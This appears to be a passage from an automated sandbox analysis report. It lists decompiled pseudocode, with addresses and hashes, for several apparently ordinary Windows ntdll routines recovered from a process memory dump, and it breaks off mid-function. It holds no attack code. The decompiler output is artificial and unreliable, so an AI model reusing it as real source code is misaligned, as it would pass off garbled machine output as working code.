                                                                      0x00ac0692
                                                                      0x00ac069e
                                                                      0x00ac06b0
                                                                      0x00ac06a0
                                                                      0x00ac06a9
                                                                      0x00ac06a9
                                                                      0x00ac06b8
                                                                      0x00ac06d6
                                                                      0x00ac06d6
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `
                                                                      • API String ID: 0-2679148245
                                                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                      • Instruction ID: eff3529c6364c685614802c3f38032944a9164977f3b06cddc62ed6935007b76
                                                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                      • Instruction Fuzzy Hash: 7131F132304305ABE720DF64CD85F9B7BE9EB84754F044229F998DB281E6B0ED14CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E00A73884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                      				char _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr* _v16;
                                                                      				char* _v20;
                                                                      				short _v22;
                                                                      				char _v24;
                                                                      				intOrPtr _t38;
                                                                      				short _t40;
                                                                      				short _t41;
                                                                      				void* _t44;
                                                                      				intOrPtr _t47;
                                                                      				void* _t48;
                                                                      
                                                                      				_v16 = __edx;
                                                                      				_t40 = 0x14;
                                                                      				_v24 = _t40;
                                                                      				_t41 = 0x16;
                                                                      				_v22 = _t41;
                                                                      				_t38 = 0;
                                                                      				_v12 = __ecx;
                                                                      				_push( &_v8);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(2);
                                                                      				_t43 =  &_v24;
                                                                      				_v20 = L"BinaryName";
                                                                      				_push( &_v24);
                                                                      				_push(__ecx);
                                                                      				_t47 = 0;
                                                                      				_t48 = E00A39650();
                                                                      				if(_t48 >= 0) {
                                                                      					_t48 = 0xc000090b;
                                                                      				}
                                                                      				if(_t48 != 0xc0000023) {
                                                                      					_t44 = 0;
                                                                      					L13:
                                                                      					if(_t48 < 0) {
                                                                      						L16:
                                                                      						if(_t47 != 0) {
                                                                      							L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                      						}
                                                                      						L18:
                                                                      						return _t48;
                                                                      					}
                                                                      					 *_v16 = _t38;
                                                                      					 *_a4 = _t47;
                                                                      					goto L18;
                                                                      				}
                                                                      				_t47 = L00A14620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                      				if(_t47 != 0) {
                                                                      					_push( &_v8);
                                                                      					_push(_v8);
                                                                      					_push(_t47);
                                                                      					_push(2);
                                                                      					_push( &_v24);
                                                                      					_push(_v12);
                                                                      					_t48 = E00A39650();
                                                                      					if(_t48 < 0) {
                                                                      						_t44 = 0;
                                                                      						goto L16;
                                                                      					}
                                                                      					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                      						_t48 = 0xc000090b;
                                                                      					}
                                                                      					_t44 = 0;
                                                                      					if(_t48 < 0) {
                                                                      						goto L16;
                                                                      					} else {
                                                                      						_t17 = _t47 + 0xc; // 0xc
                                                                      						_t38 = _t17;
                                                                      						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                      							_t48 = 0xc000090b;
                                                                      						}
                                                                      						goto L13;
                                                                      					}
                                                                      				}
                                                                      				_t48 = _t48 + 0xfffffff4;
                                                                      				goto L18;
                                                                      			}















                                                                      0x00a73893
                                                                      0x00a73896
                                                                      0x00a73899
                                                                      0x00a7389f
                                                                      0x00a738a0
                                                                      0x00a738a4
                                                                      0x00a738a9
                                                                      0x00a738ac
                                                                      0x00a738ad
                                                                      0x00a738ae
                                                                      0x00a738af
                                                                      0x00a738b1
                                                                      0x00a738b4
                                                                      0x00a738bb
                                                                      0x00a738bc
                                                                      0x00a738bd
                                                                      0x00a738c4
                                                                      0x00a738c8
                                                                      0x00a738ca
                                                                      0x00a738ca
                                                                      0x00a738d5
                                                                      0x00a7393e
                                                                      0x00a73940
                                                                      0x00a73942
                                                                      0x00a73952
                                                                      0x00a73954
                                                                      0x00a73961
                                                                      0x00a73961
                                                                      0x00a73967
                                                                      0x00a7396e
                                                                      0x00a7396e
                                                                      0x00a73947
                                                                      0x00a7394c
                                                                      0x00000000
                                                                      0x00a7394c
                                                                      0x00a738ea
                                                                      0x00a738ee
                                                                      0x00a738f8
                                                                      0x00a738f9
                                                                      0x00a738ff
                                                                      0x00a73900
                                                                      0x00a73902
                                                                      0x00a73903
                                                                      0x00a7390b
                                                                      0x00a7390f
                                                                      0x00a73950
                                                                      0x00000000
                                                                      0x00a73950
                                                                      0x00a73915
                                                                      0x00a7391d
                                                                      0x00a7391d
                                                                      0x00a73922
                                                                      0x00a73926
                                                                      0x00000000
                                                                      0x00a73928
                                                                      0x00a7392b
                                                                      0x00a7392b
                                                                      0x00a73935
                                                                      0x00a73937
                                                                      0x00a73937
                                                                      0x00000000
                                                                      0x00a73935
                                                                      0x00a73926
                                                                      0x00a738f0
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryName
                                                                      • API String ID: 0-215506332
                                                                      • Opcode ID: 3429ffbaf6bcb1de8b153e7546c5b5cb47275654e543d46026a625be8c83057d
                                                                      • Instruction ID: 62df6e0e0a6b2db1de479f886cfbd0db9bf5ae8c22527be606a5908530f8a6c3
                                                                      • Opcode Fuzzy Hash: 3429ffbaf6bcb1de8b153e7546c5b5cb47275654e543d46026a625be8c83057d
                                                                      • Instruction Fuzzy Hash: 6B31247390151AAFDF15CB59CD61DAFB774EB40720F02C169BA18A7280D7709F00D7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 33%
                                                                      			E00A2D294(void* __ecx, char __edx, void* __eflags) {
                                                                      				signed int _v8;
                                                                      				char _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				intOrPtr _v64;
                                                                      				char* _v68;
                                                                      				intOrPtr _v72;
                                                                      				char _v76;
                                                                      				signed int _v84;
                                                                      				intOrPtr _v88;
                                                                      				char _v92;
                                                                      				intOrPtr _v96;
                                                                      				intOrPtr _v100;
                                                                      				char _v104;
                                                                      				char _v105;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t35;
                                                                      				char _t38;
                                                                      				signed int _t40;
                                                                      				signed int _t44;
                                                                      				signed int _t52;
                                                                      				void* _t53;
                                                                      				void* _t55;
                                                                      				void* _t61;
                                                                      				intOrPtr _t62;
                                                                      				void* _t64;
                                                                      				signed int _t65;
                                                                      				signed int _t66;
                                                                      
                                                                      				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                      				_v8 =  *0xaed360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                      				_v105 = __edx;
                                                                      				_push( &_v92);
                                                                      				_t52 = 0;
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push( &_v104);
                                                                      				_push(0);
                                                                      				_t59 = __ecx;
                                                                      				_t55 = 2;
                                                                      				if(E00A14120(_t55, __ecx) < 0) {
                                                                      					_t35 = 0;
                                                                      					L8:
                                                                      					_pop(_t61);
                                                                      					_pop(_t64);
                                                                      					_pop(_t53);
                                                                      					return E00A3B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                      				}
                                                                      				_v96 = _v100;
                                                                      				_t38 = _v92;
                                                                      				if(_t38 != 0) {
                                                                      					_v104 = _t38;
                                                                      					_v100 = _v88;
                                                                      					_t40 = _v84;
                                                                      				} else {
                                                                      					_t40 = 0;
                                                                      				}
                                                                      				_v72 = _t40;
                                                                      				_v68 =  &_v104;
                                                                      				_push( &_v52);
                                                                      				_v76 = 0x18;
                                                                      				_push( &_v76);
                                                                      				_v64 = 0x40;
                                                                      				_v60 = _t52;
                                                                      				_v56 = _t52;
                                                                      				_t44 = E00A398D0();
                                                                      				_t62 = _v88;
                                                                      				_t65 = _t44;
                                                                      				if(_t62 != 0) {
                                                                      					asm("lock xadd [edi], eax");
                                                                      					if((_t44 | 0xffffffff) != 0) {
                                                                      						goto L4;
                                                                      					}
                                                                      					_push( *((intOrPtr*)(_t62 + 4)));
                                                                      					E00A395D0();
                                                                      					L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                      					goto L4;
                                                                      				} else {
                                                                      					L4:
                                                                      					L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                      					if(_t65 >= 0) {
                                                                      						_t52 = 1;
                                                                      					} else {
                                                                      						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                                      							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                      						}
                                                                      					}
                                                                      					_t35 = _t52;
                                                                      					goto L8;
                                                                      				}
                                                                      			}

































                                                                      0x00a2d29c
                                                                      0x00a2d2a6
                                                                      0x00a2d2b1
                                                                      0x00a2d2b5
                                                                      0x00a2d2b6
                                                                      0x00a2d2bc
                                                                      0x00a2d2bd
                                                                      0x00a2d2be
                                                                      0x00a2d2bf
                                                                      0x00a2d2c2
                                                                      0x00a2d2c4
                                                                      0x00a2d2cc
                                                                      0x00a2d384
                                                                      0x00a2d34b
                                                                      0x00a2d34f
                                                                      0x00a2d350
                                                                      0x00a2d351
                                                                      0x00a2d35c
                                                                      0x00a2d35c
                                                                      0x00a2d2d6
                                                                      0x00a2d2da
                                                                      0x00a2d2e1
                                                                      0x00a2d361
                                                                      0x00a2d369
                                                                      0x00a2d36d
                                                                      0x00a2d2e3
                                                                      0x00a2d2e3
                                                                      0x00a2d2e3
                                                                      0x00a2d2e5
                                                                      0x00a2d2ed
                                                                      0x00a2d2f5
                                                                      0x00a2d2fa
                                                                      0x00a2d302
                                                                      0x00a2d303
                                                                      0x00a2d30b
                                                                      0x00a2d30f
                                                                      0x00a2d313
                                                                      0x00a2d318
                                                                      0x00a2d31c
                                                                      0x00a2d320
                                                                      0x00a2d379
                                                                      0x00a2d37d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a6affe
                                                                      0x00a6b001
                                                                      0x00a6b011
                                                                      0x00000000
                                                                      0x00a2d322
                                                                      0x00a2d322
                                                                      0x00a2d330
                                                                      0x00a2d337
                                                                      0x00a2d35d
                                                                      0x00a2d339
                                                                      0x00a2d33f
                                                                      0x00a2d38c
                                                                      0x00a2d38c
                                                                      0x00a2d33f
                                                                      0x00a2d349
                                                                      0x00000000
                                                                      0x00a2d349

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: 599cab57b7f9d9c7417ac65020b3c7221f6d251c31ad3fb997b4cba5d897cce1
                                                                      • Instruction ID: 6f0fecf7dc5d8fb371c243c391907bcc416c2042e9aab5f137b7e3b157a4b40c
                                                                      • Opcode Fuzzy Hash: 599cab57b7f9d9c7417ac65020b3c7221f6d251c31ad3fb997b4cba5d897cce1
                                                                      • Instruction Fuzzy Hash: 8A318AB6508315AFC311DF2CD9819ABBBE8EB89754F10092EF9949B252D734DD04CB93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E00A01B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                                      				intOrPtr _v8;
                                                                      				char _v16;
                                                                      				intOrPtr* _t26;
                                                                      				intOrPtr _t29;
                                                                      				void* _t30;
                                                                      				signed int _t31;
                                                                      
                                                                      				_t27 = __ecx;
                                                                      				_t29 = __edx;
                                                                      				_t31 = 0;
                                                                      				_v8 = __edx;
                                                                      				if(__edx == 0) {
                                                                      					L18:
                                                                      					_t30 = 0xc000000d;
                                                                      					goto L12;
                                                                      				} else {
                                                                      					_t26 = _a4;
                                                                      					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                                      						goto L18;
                                                                      					} else {
                                                                      						E00A3BB40(__ecx,  &_v16, __ecx);
                                                                      						_push(_t26);
                                                                      						_push(0);
                                                                      						_push(0);
                                                                      						_push(_t29);
                                                                      						_push( &_v16);
                                                                      						_t30 = E00A3A9B0();
                                                                      						if(_t30 >= 0) {
                                                                      							_t19 =  *_t26;
                                                                      							if( *_t26 != 0) {
                                                                      								goto L7;
                                                                      							} else {
                                                                      								 *_a8 =  *_a8 & 0;
                                                                      							}
                                                                      						} else {
                                                                      							if(_t30 != 0xc0000023) {
                                                                      								L9:
                                                                      								_push(_t26);
                                                                      								_push( *_t26);
                                                                      								_push(_t31);
                                                                      								_push(_v8);
                                                                      								_push( &_v16);
                                                                      								_t30 = E00A3A9B0();
                                                                      								if(_t30 < 0) {
                                                                      									L12:
                                                                      									if(_t31 != 0) {
                                                                      										L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                                      									}
                                                                      								} else {
                                                                      									 *_a8 = _t31;
                                                                      								}
                                                                      							} else {
                                                                      								_t19 =  *_t26;
                                                                      								if( *_t26 == 0) {
                                                                      									_t31 = 0;
                                                                      								} else {
                                                                      									L7:
                                                                      									_t31 = L00A14620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                                      								}
                                                                      								if(_t31 == 0) {
                                                                      									_t30 = 0xc0000017;
                                                                      								} else {
                                                                      									goto L9;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t30;
                                                                      			}









                                                                      0x00a01b8f
                                                                      0x00a01b9a
                                                                      0x00a01b9c
                                                                      0x00a01b9e
                                                                      0x00a01ba3
                                                                      0x00a57010
                                                                      0x00a57010
                                                                      0x00000000
                                                                      0x00a01ba9
                                                                      0x00a01ba9
                                                                      0x00a01bae
                                                                      0x00000000
                                                                      0x00a01bc5
                                                                      0x00a01bca
                                                                      0x00a01bcf
                                                                      0x00a01bd0
                                                                      0x00a01bd1
                                                                      0x00a01bd2
                                                                      0x00a01bd6
                                                                      0x00a01bdc
                                                                      0x00a01be0
                                                                      0x00a56ffc
                                                                      0x00a57000
                                                                      0x00000000
                                                                      0x00a57006
                                                                      0x00a57009
                                                                      0x00a57009
                                                                      0x00a01be6
                                                                      0x00a01bec
                                                                      0x00a01c0b
                                                                      0x00a01c0b
                                                                      0x00a01c0c
                                                                      0x00a01c11
                                                                      0x00a01c12
                                                                      0x00a01c15
                                                                      0x00a01c1b
                                                                      0x00a01c1f
                                                                      0x00a01c31
                                                                      0x00a01c33
                                                                      0x00a57026
                                                                      0x00a57026
                                                                      0x00a01c21
                                                                      0x00a01c24
                                                                      0x00a01c24
                                                                      0x00a01bee
                                                                      0x00a01bee
                                                                      0x00a01bf2
                                                                      0x00a01c3a
                                                                      0x00a01bf4
                                                                      0x00a01bf4
                                                                      0x00a01c05
                                                                      0x00a01c05
                                                                      0x00a01c09
                                                                      0x00a01c3e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a01c09
                                                                      0x00a01bec
                                                                      0x00a01be0
                                                                      0x00a01bae
                                                                      0x00a01c2e

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: WindowsExcludedProcs
                                                                      • API String ID: 0-3583428290
                                                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                      • Instruction ID: 084ca92c473cbd454cbfc3e36976e7d8ab81c1b8d0325fe10ab738e5508fb4a5
                                                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                      • Instruction Fuzzy Hash: 4921F27794022CABEB229B59E940FEFB7BDAF41B51F164425FD049B280D634DC04D7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00A1F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                      				intOrPtr _t13;
                                                                      				intOrPtr _t14;
                                                                      				signed int _t16;
                                                                      				signed char _t17;
                                                                      				intOrPtr _t19;
                                                                      				intOrPtr _t21;
                                                                      				intOrPtr _t23;
                                                                      				intOrPtr* _t25;
                                                                      
                                                                      				_t25 = _a8;
                                                                      				_t17 = __ecx;
                                                                      				if(_t25 == 0) {
                                                                      					_t19 = 0xc00000f2;
                                                                      					L8:
                                                                      					return _t19;
                                                                      				}
                                                                      				if((__ecx & 0xfffffffe) != 0) {
                                                                      					_t19 = 0xc00000ef;
                                                                      					goto L8;
                                                                      				}
                                                                      				_t19 = 0;
                                                                      				 *_t25 = 0;
                                                                      				_t21 = 0;
                                                                      				_t23 = "Actx ";
                                                                      				if(__edx != 0) {
                                                                      					if(__edx == 0xfffffffc) {
                                                                      						L21:
                                                                      						_t21 = 0x200;
                                                                      						L5:
                                                                      						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                                      						 *_t25 = _t13;
                                                                      						L6:
                                                                      						if(_t13 == 0) {
                                                                      							if((_t17 & 0x00000001) != 0) {
                                                                      								 *_t25 = _t23;
                                                                      							}
                                                                      						}
                                                                      						L7:
                                                                      						goto L8;
                                                                      					}
                                                                      					if(__edx == 0xfffffffd) {
                                                                      						 *_t25 = _t23;
                                                                      						_t13 = _t23;
                                                                      						goto L6;
                                                                      					}
                                                                      					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                                      					 *_t25 = _t13;
                                                                      					L14:
                                                                      					if(_t21 == 0) {
                                                                      						goto L6;
                                                                      					}
                                                                      					goto L5;
                                                                      				}
                                                                      				_t14 = _a4;
                                                                      				if(_t14 != 0) {
                                                                      					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                                      					if(_t16 <= 1) {
                                                                      						_t21 = 0x1f8;
                                                                      						_t13 = 0;
                                                                      						goto L14;
                                                                      					}
                                                                      					if(_t16 == 2) {
                                                                      						goto L21;
                                                                      					}
                                                                      					if(_t16 != 4) {
                                                                      						_t19 = 0xc00000f0;
                                                                      						goto L7;
                                                                      					}
                                                                      					_t13 = 0;
                                                                      					goto L6;
                                                                      				} else {
                                                                      					_t21 = 0x1f8;
                                                                      					goto L5;
                                                                      				}
                                                                      			}











                                                                      0x00a1f71d
                                                                      0x00a1f722
                                                                      0x00a1f726
                                                                      0x00a64770
                                                                      0x00a1f765
                                                                      0x00a1f769
                                                                      0x00a1f769
                                                                      0x00a1f732
                                                                      0x00a6477a
                                                                      0x00000000
                                                                      0x00a6477a
                                                                      0x00a1f738
                                                                      0x00a1f73a
                                                                      0x00a1f73c
                                                                      0x00a1f73f
                                                                      0x00a1f746
                                                                      0x00a1f778
                                                                      0x00a1f7a9
                                                                      0x00a1f7a9
                                                                      0x00a1f754
                                                                      0x00a1f75a
                                                                      0x00a1f75d
                                                                      0x00a1f75f
                                                                      0x00a1f761
                                                                      0x00a1f76f
                                                                      0x00a1f771
                                                                      0x00a1f771
                                                                      0x00a1f76f
                                                                      0x00a1f763
                                                                      0x00000000
                                                                      0x00a1f763
                                                                      0x00a1f77d
                                                                      0x00a1f7a3
                                                                      0x00a1f7a5
                                                                      0x00000000
                                                                      0x00a1f7a5
                                                                      0x00a1f77f
                                                                      0x00a1f782
                                                                      0x00a1f784
                                                                      0x00a1f786
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a1f788
                                                                      0x00a1f748
                                                                      0x00a1f74d
                                                                      0x00a1f78d
                                                                      0x00a1f793
                                                                      0x00a1f7b7
                                                                      0x00a1f7bc
                                                                      0x00000000
                                                                      0x00a1f7bc
                                                                      0x00a1f798
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a1f79d
                                                                      0x00a1f7b0
                                                                      0x00000000
                                                                      0x00a1f7b0
                                                                      0x00a1f79f
                                                                      0x00000000
                                                                      0x00a1f74f
                                                                      0x00a1f74f
                                                                      0x00000000
                                                                      0x00a1f74f

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Actx
                                                                      • API String ID: 0-89312691
                                                                      • Opcode ID: 46a06dd15165827d29d8f7106a01c49ca25564cae9225f3ebfd03c04b6fa6972
                                                                      • Instruction ID: 2dee655820c59765eebfe7660967859a280f470c933e47efca7a58fae7535525
                                                                      • Opcode Fuzzy Hash: 46a06dd15165827d29d8f7106a01c49ca25564cae9225f3ebfd03c04b6fa6972
                                                                      • Instruction Fuzzy Hash: 16119D39B046828FEB244F1D89907B672A6AB96724F39453AE466CB3E1DB70CCC18340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E00AA8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                      				intOrPtr _t35;
                                                                      				void* _t41;
                                                                      
                                                                      				_t40 = __esi;
                                                                      				_t39 = __edi;
                                                                      				_t38 = __edx;
                                                                      				_t35 = __ecx;
                                                                      				_t34 = __ebx;
                                                                      				_push(0x74);
                                                                      				_push(0xad0d50);
                                                                      				E00A4D0E8(__ebx, __edi, __esi);
                                                                      				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                                      				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                                      					E00A85720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                                      					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                                      						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                      						asm("int3");
                                                                      						 *(_t41 - 4) = 0xfffffffe;
                                                                      					}
                                                                      				}
                                                                      				 *(_t41 - 4) = 1;
                                                                      				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                                      				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                                      				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                                      				 *((intOrPtr*)(_t41 - 0x64)) = L00A4DEF0;
                                                                      				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                                      				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                                      				_push(_t41 - 0x70);
                                                                      				L00A4DEF0(1, _t38);
                                                                      				 *(_t41 - 4) = 0xfffffffe;
                                                                      				return E00A4D130(_t34, _t39, _t40);
                                                                      			}





                                                                      0x00aa8df1
                                                                      0x00aa8df1
                                                                      0x00aa8df1
                                                                      0x00aa8df1
                                                                      0x00aa8df1
                                                                      0x00aa8df1
                                                                      0x00aa8df3
                                                                      0x00aa8df8
                                                                      0x00aa8dfd
                                                                      0x00aa8e00
                                                                      0x00aa8e0e
                                                                      0x00aa8e2a
                                                                      0x00aa8e36
                                                                      0x00aa8e38
                                                                      0x00aa8e3c
                                                                      0x00aa8e46
                                                                      0x00aa8e46
                                                                      0x00aa8e36
                                                                      0x00aa8e50
                                                                      0x00aa8e56
                                                                      0x00aa8e59
                                                                      0x00aa8e5c
                                                                      0x00aa8e60
                                                                      0x00aa8e67
                                                                      0x00aa8e6d
                                                                      0x00aa8e73
                                                                      0x00aa8e74
                                                                      0x00aa8eb1
                                                                      0x00aa8ebd

                                                                      Strings
                                                                      • Critical error detected %lx, xrefs: 00AA8E21
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Critical error detected %lx
                                                                      • API String ID: 0-802127002
                                                                      • Opcode ID: d3b76ba2eb11d9ad6490275517f3e8991a71d5956f2cc109c01e84036d002d97
                                                                      • Instruction ID: 741fac813bfb5c8a92c31c22de74bb1c1a4896f58bd830f90cf630ab4c272fbf
                                                                      • Opcode Fuzzy Hash: d3b76ba2eb11d9ad6490275517f3e8991a71d5956f2cc109c01e84036d002d97
                                                                      • Instruction Fuzzy Hash: 7E118775D00348EBDF24CFA8C60679CBBB0BB45714F20822EE569AB2C2C7384A02CF14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00A8FF60
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                      • API String ID: 0-1911121157
                                                                      • Opcode ID: 8bf6250ce0abae77aa0d21b03dd093bac58c24570514080b804c4eca4bae4760
                                                                      • Instruction ID: 55411277fc11443aa9d2c6d47e5ff3b94591bb8a0862faf65aa928f32b49081a
                                                                      • Opcode Fuzzy Hash: 8bf6250ce0abae77aa0d21b03dd093bac58c24570514080b804c4eca4bae4760
                                                                      • Instruction Fuzzy Hash: A811C075A10584EFDB22EB50CE89F9CB7B1FF48714F148464F6096B2A2C7399D90CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 99%
                                                                      			E009FF900(signed int _a4, signed int _a8) {
                                                                      				signed char _v5;
                                                                      				signed char _v6;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed char _t285;
                                                                      				signed int _t289;
                                                                      				signed char _t292;
                                                                      				signed int _t293;
                                                                      				signed char _t295;
                                                                      				signed int _t300;
                                                                      				signed int _t301;
                                                                      				signed char _t306;
                                                                      				signed char _t307;
                                                                      				signed char _t308;
                                                                      				signed int _t310;
                                                                      				signed int _t311;
                                                                      				signed int _t312;
                                                                      				signed char _t314;
                                                                      				signed int _t316;
                                                                      				signed int _t318;
                                                                      				signed int _t319;
                                                                      				signed int _t320;
                                                                      				signed int _t322;
                                                                      				signed int _t323;
                                                                      				signed int _t328;
                                                                      				signed char _t329;
                                                                      				signed int _t337;
                                                                      				signed int _t339;
                                                                      				signed int _t343;
                                                                      				signed int _t345;
                                                                      				signed int _t348;
                                                                      				signed char _t350;
                                                                      				signed int _t351;
                                                                      				signed char _t353;
                                                                      				signed char _t356;
                                                                      				signed int _t357;
                                                                      				signed char _t359;
                                                                      				signed int _t360;
                                                                      				signed char _t363;
                                                                      				signed int _t364;
                                                                      				signed int _t366;
                                                                      				signed int* _t372;
                                                                      				signed char _t373;
                                                                      				signed char _t378;
                                                                      				signed int _t379;
                                                                      				signed int* _t382;
                                                                      				signed int _t383;
                                                                      				signed char _t385;
                                                                      				signed int _t387;
                                                                      				signed int _t388;
                                                                      				signed char _t390;
                                                                      				signed int _t393;
                                                                      				signed int _t395;
                                                                      				signed char _t397;
                                                                      				signed int _t401;
                                                                      				signed int _t405;
                                                                      				signed int _t407;
                                                                      				signed int _t409;
                                                                      				signed int _t410;
                                                                      				signed int _t413;
                                                                      				signed char _t415;
                                                                      				signed int _t416;
                                                                      				signed char _t418;
                                                                      				signed int _t419;
                                                                      				signed int _t421;
                                                                      				signed int _t422;
                                                                      				signed int _t423;
                                                                      				signed char* _t425;
                                                                      				signed char _t426;
                                                                      				signed char _t427;
                                                                      				signed int _t428;
                                                                      				signed int _t429;
                                                                      				signed int _t431;
                                                                      				signed int _t432;
                                                                      				signed int _t434;
                                                                      				signed int _t436;
                                                                      				signed int _t444;
                                                                      				signed int _t445;
                                                                      				signed int _t446;
                                                                      				signed int _t452;
                                                                      				signed int _t454;
                                                                      				signed int _t455;
                                                                      				signed int _t456;
                                                                      				signed int _t457;
                                                                      				signed int _t461;
                                                                      				signed int _t462;
                                                                      				signed int _t464;
                                                                      				signed int _t467;
                                                                      				signed int _t470;
                                                                      				signed int _t474;
                                                                      				signed int _t475;
                                                                      				signed int _t477;
                                                                      				signed int _t481;
                                                                      				signed int _t483;
                                                                      				signed int _t486;
                                                                      				signed int _t487;
                                                                      				signed int _t488;
                                                                      
                                                                      				_t285 =  *(_a4 + 4);
                                                                      				_t444 = _a8;
                                                                      				_t452 =  *_t444;
                                                                      				_t421 = _t285 & 1;
                                                                      				if(_t421 != 0) {
                                                                      					if(_t452 != 0) {
                                                                      						_t452 = _t452 ^ _t444;
                                                                      					}
                                                                      				}
                                                                      				_t393 =  *(_t444 + 4);
                                                                      				if(_t421 != 0) {
                                                                      					if(_t393 != 0) {
                                                                      						_t393 = _t393 ^ _t444;
                                                                      					}
                                                                      				}
                                                                      				_t426 = _t393;
                                                                      				if(_t452 != 0) {
                                                                      					_t426 = _t452;
                                                                      				}
                                                                      				_v5 = _t285 & 0x00000001;
                                                                      				asm("sbb eax, eax");
